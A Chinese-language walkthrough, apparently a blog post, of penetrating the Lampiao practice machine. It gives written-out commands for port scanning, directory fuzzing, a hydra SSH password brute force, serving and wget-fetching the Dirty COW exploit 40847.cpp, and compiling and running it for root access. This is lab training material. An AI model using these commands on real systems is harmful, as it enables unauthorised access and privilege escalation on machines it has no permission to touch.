当前位置: 首页 > news >正文

Lampiao靶场渗透wp-脏牛提权

nmap扫描端口
nmap -p- 192.168.111.100 -T4
image
开放三个端口,对80端口进行访问
image
没有什么信息,继续访问1898端口
dirsearch -u http://192.168.111.100:1898/
直接进行fuzz
image
比较多有用的信息,一个一个分析,由于我们得到了两个类似用户名的东西,并且ssh端口开放,但我们不知道密码,使用hydra进行爆破
hydra -l tiago -P /usr/share/wordlists/rockyou.txt 192.168.111.100 ssh
得到密码Virgulino
进行ssh连接
ssh tiago@192.168.111.100
image
执行命令,看看权限
image
权限比较低,我们直接进行信息收集,发现网站相关信息版本号 Drupal 7.54进行搜索(Drupal是一个开源内容管理系统(CMS))
msf进行搜索
image
选择40847.cpp脚本并拷贝到home目录下
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
通过python开启本地http服务
python -m SimpleHTTPServer 5555
image
ssh得到脚本
wget http://192.168.111.25:5555/40847.cpp
image
进行编译,并运行
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
image
得到高权限账号密码,ssh登录即可

http://www.hskmm.com/?act=detail&tid=16130

相关文章:

  • 画矩形
  • NOIP 模拟赛八
  • 第三篇
  • 基于cloacked-pixel隐写工具爆破项目
  • 随便写的
  • Bcliux-docker-nacos2.2.0升级至2.2.3版本
  • 社交网络架构。京东场景题:亿级用户100Wqps 社交关系如何设计?如何查看我的关注,关注我的?
  • go 面试题
  • 事件和图形界面(暂未完成)
  • 什么是sql 慢日志。哈罗面试:没开sql慢日志,怎么发现慢 sql?
  • Spring连环炮。哈罗面试:Spring Bean生命周期,Spring怎么创建Bean的,BFPP和BPP的x别
  • redis 大 key 优化。哈罗面试:redis 有个大 key需要在线优化, 不能影响现有业务,请求不能大量到库,怎么优化?
  • ACL高可用架构。希音面试:第三方挂了,我们总在背锅。来一 靠谱的 高可用方案,让 外部依赖 稳如泰山
  • 软工9.24
  • 2025CSP-S模拟赛51
  • 2025年9月24日 - 20243867孙堃2405
  • 【星海随笔】RabbitMQ开发篇 - 教程
  • P13754 【MX-X17-T3】Distraction
  • 2025.9.24
  • 初学汇编
  • 架构图设计还得是华为 - 智慧园区
  • 解决zsh: corrupt history file /home/sgud4h5gh/.zsh_history的办法
  • StarRocks GitHub 工作流程
  • 对象初始化器的使用方法
  • C++、Java 和 Python 在输入输出差别
  • 我的学习记录之自我介绍、思维导图和监督措施
  • 用 Java 和 Tesseract 进行验证码识别:基础实现与优化
  • Java第二次实验
  • 详细介绍:【2025PolarCTF秋季个人赛】WEB方向wp
  • 英语_阅读